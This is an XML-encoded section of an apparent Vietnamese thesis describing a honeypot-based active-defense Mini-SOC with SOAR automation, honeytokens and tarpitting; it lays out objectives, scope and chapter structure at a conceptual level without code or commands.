        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hoàn toàn không có. Không biết IP là ai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Reverse Intel Engine tự động query AbuseIPDB, Shodan API, quét cổng an toàn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phòng thủ Chủ động (Deception)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Honeypot mặc định, hacker dễ phát hiện chữ ký.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tùy biến Filesystem chuyên sâu + Gài bẫy Honeytokens (Canary de-anonymization).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phản đòn &amp; Tiêu hao Tài nguyên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Không có. Attacker quét thoải mái.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kỹ thuật Tarpitting (Giam lỏng kết nối, làm treo thread tấn công của Botnet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phân tích Mã độc (Malware Staging)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Chỉ lưu file vào ổ đĩa, không làm gì thêm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Payload Analyzer tự động trích xuất SHA256, IOCs và tra cứu VirusTotal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thời gian Phản ứng (MTTR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phụ thuộc 100% vào người đọc tin nhắn (15 - 30 phút).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tự động hóa hoàn toàn bằng SOAR Playbooks (1.8 - 2.5 giây).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.5 Mục tiêu nghiên cứu và Các đóng góp khoa học - kỹ thuật của Đề tài</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mục tiêu tổng quát của đồ án là nghiên cứu, thiết kế kiến trúc và hiện thực hóa thành công một Hệ thống Phòng thủ Chủ động (Active Defense Framework) quy mô Mini-SOC, tích hợp chặt chẽ giữa Cowrie SSH Honeypot với Nền tảng Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công nhằm bảo vệ hạ tầng máy chủ Linux trước các chiến dịch tấn công dò quét tự động.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để đạt được mục tiêu tổng quát trên, đồ án tập trung vào các mục tiêu cụ thể và đạt được các đóng góp kỹ thuật then chốt sau:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Về mặt Lý thuyết &amp; Khung phương pháp luận: Phân định ranh giới pháp lý và kỹ thuật giữa 'Hack-back phá hoại bất hợp pháp' và 'Phòng thủ chủ động hợp pháp (Active Defense)' dựa trên khung chiến lược chuẩn quốc tế MITRE D3FEND và MITRE Engage. Xây dựng mô hình chuỗi phản đòn bằng Deception và De-anonymization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Về mặt Thiết kế Kiến trúc Hệ thống: Thiết kế kiến trúc phân lớp Mini-SOC linh hoạt, module hóa cao độ, đảm bảo khả năng mở rộng (Scalability) và dễ dàng tích hợp thêm các cảm biến honeypot khác trong tương lai.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Về mặt Xây dựng Động cơ Tương quan (Correlation Engine): Tự phát triển thuật toán trượt cửa sổ thời gian (Sliding Time Window) để phát hiện tấn công dò quét mật khẩu (T1110.001), phân biệt giữa các đợt quét tự động vô hại và các cuộc xâm nhập có chủ đích, loại bỏ triệt để hiện tượng Alert Fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Về mặt Trinh sát ngược &amp; Tình báo đe dọa (Threat Intel Engine): Tích hợp tự động đa nguồn dữ liệu mở (Multi-source OSINT) bao gồm AbuseIPDB, Shodan API, GeoIP ASN và cơ chế quét cổng an toàn (Safe Port Probing) nhằm lập hồ sơ kẻ tấn công (Attacker Profiling) ngay trong mili-giây đầu tiên của sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. Về mặt Đánh lừa &amp; Bẫy mồi Khử ẩn danh (Active Honeytokens): Xây dựng cơ chế sinh tự động các file tài liệu mồi nhử (Fake AWS Keys, Fake Bash History, Fake Database Dumps) có nhúng Canary Webhook Beacons. Khi hacker đánh cắp tài liệu và mở trên máy thật, hệ thống sẽ bắt được IP thật và dấu vân tay trình duyệt của hacker, giải quyết triệt để bài toán hacker ẩn danh qua Proxy/Tor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6. Về mặt Tự động hóa Phản ứng &amp; Tiêu hao đối phương (SOAR Enforcer &amp; Tarpitting): Triển khai thành công kỹ thuật giam lỏng Tarpit (Endless Socket Hold) làm tiêu hao tài nguyên CPU/RAM/Bandwidth của các máy chủ tấn công, kết hợp với cơ chế cập nhật tự động Tường lửa iptables/nftables và đồng bộ Threat Feed IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7. Về mặt Tác chiến &amp; Điều hành: Xây dựng Telegram SOAR Bot tương tác 2 chiều (Bidirectional Interactive Bot) trang bị bàn phím điều khiển tức thời (Inline Keyboard Actions), cho phép chuyên viên SOC ra quyết định tác chiến ngay trên thiết bị di động trong vài giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.6 Đối tượng, Phạm vi và Giới hạn nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Đối tượng nghiên cứu: Các hành vi, kỹ thuật và phương thức tấn công nhắm vào dịch vụ truy cập từ xa SSH/Telnet; Công nghệ bẫy Medium-Interaction Honeypot (Cowrie); Kỹ thuật phân tích log và tương quan sự kiện theo chuẩn MITRE ATT&amp;CK; Kỹ thuật phòng thủ chủ động bằng Honeytoken và Tarpitting; Nền tảng điều phối phản ứng sự cố tự động SOAR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Phạm vi triển khai: Hệ thống được xây dựng và triển khai trên nền tảng hệ điều hành máy chủ Linux (Ubuntu Server 22.04 LTS / Debian 12), hỗ trợ môi trường ảo hóa Docker Container và tương thích kiểm thử trên máy trạm Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Giới hạn nghiên cứu: Đồ án tập trung vào phân tích và phản ứng các cuộc tấn công nhắm vào giao thức SSH và Telnet. Các cuộc tấn công ứng dụng Web (HTTP/HTTPS) hoặc dịch vụ cơ sở dữ liệu phân tán không nằm trong phạm vi cảm biến chính của đề tài (mặc dù kiến trúc SOAR được thiết kế sẵn sàng để mở rộng nhận log từ các cảm biến khác).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.7 Bố cục toàn văn của Đồ án</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nội dung báo cáo đồ án được kết cấu thành 6 chương chính cùng các phần phụ lục và danh mục tài liệu tham khảo chi tiết:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Chương 1: Tổng quan và Đặt vấn đề - Phân tích bối cảnh, thực trạng tấn công SSH, hạn chế của phòng thủ thụ động, phân tích nhận xét của giảng viên và xác định mục tiêu nghiên cứu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Chương 2: Cơ sở Lý thuyết và Khung Công nghệ - Trình bày nền tảng lý thuyết về Honeypot, kiến trúc Cowrie, khung pháp lý/kỹ thuật của Active Defense, công nghệ Honeytoken khử ẩn danh, khung tự động hóa SOAR, kỹ thuật Tarpit và ma trận MITRE ATT&amp;CK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Chương 3: Thiết kế Kiến trúc Hệ thống Mini-SOC Active Defense - Trình bày thiết kế chi tiết 5 phân lớp của hệ thống, luồng dữ liệu, lưu đồ thuật toán tương quan sự kiện và thiết kế các playbook phản ứng sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Chương 4: Hiện thực hóa và Mã nguồn các Phân hệ - Chi tiết hóa quá trình cài đặt môi trường, tùy biến Honeypot chuyên sâu và phân tích mã nguồn chi tiết các module Python tự phát triển.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Chương 5: Thử nghiệm Thực tế, Đánh giá và Phân tích Tấn công - Trình bày kết quả kiểm nghiệm trên 4 kịch bản tấn công Red Team giả lập, phân tích hiệu năng giảm thiểu MTTR, đánh giá hiệu quả bóp nghẽn của Tarpit và thống kê dữ liệu tấn công thực tế từ Internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Chương 6: Kết luận và Hướng phát triển - Tổng kết các đóng góp đạt được, chỉ ra những hạn chế và đề xuất định hướng phát triển nâng cao trong tương lai.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 2: CƠ SỞ LÝ THUYẾT VÀ KHUNG CÔNG NGHỆ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.1 Bản chất và Phân loại Công nghệ Bẫy Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thuật ngữ Honeypot (Bình mật) được giới thiệu lần đầu tiên trong lĩnh vực an toàn thông tin bởi Clifford Stoll trong cuốn tiểu thuyết kinh điển 'The Cuckoo's Egg' (1989) và sau đó được Lance Spitzner chính thức định nghĩa một cách khoa học: 'Honeypot là một tài nguyên an ninh thông tin mà giá trị cốt lõi của nó nằm ở chỗ nó bị thăm dò, bị tấn công hoặc bị xâm phạm trái phép'. Bản chất của Honeypot là một hệ thống không phục vụ bất kỳ mục đích sản xuất hay kinh doanh hợp pháp nào. Do đó, bất kỳ nỗ lực kết nối, rà quét hay tương tác nào hướng tới Honeypot đều được coi là hành vi bất thường hoặc có ý đồ xấu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Dựa trên mức độ tương tác (Level of Interaction) cho phép kẻ tấn công thực hiện, công nghệ Honeypot được phân chia thành ba nhóm chính:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
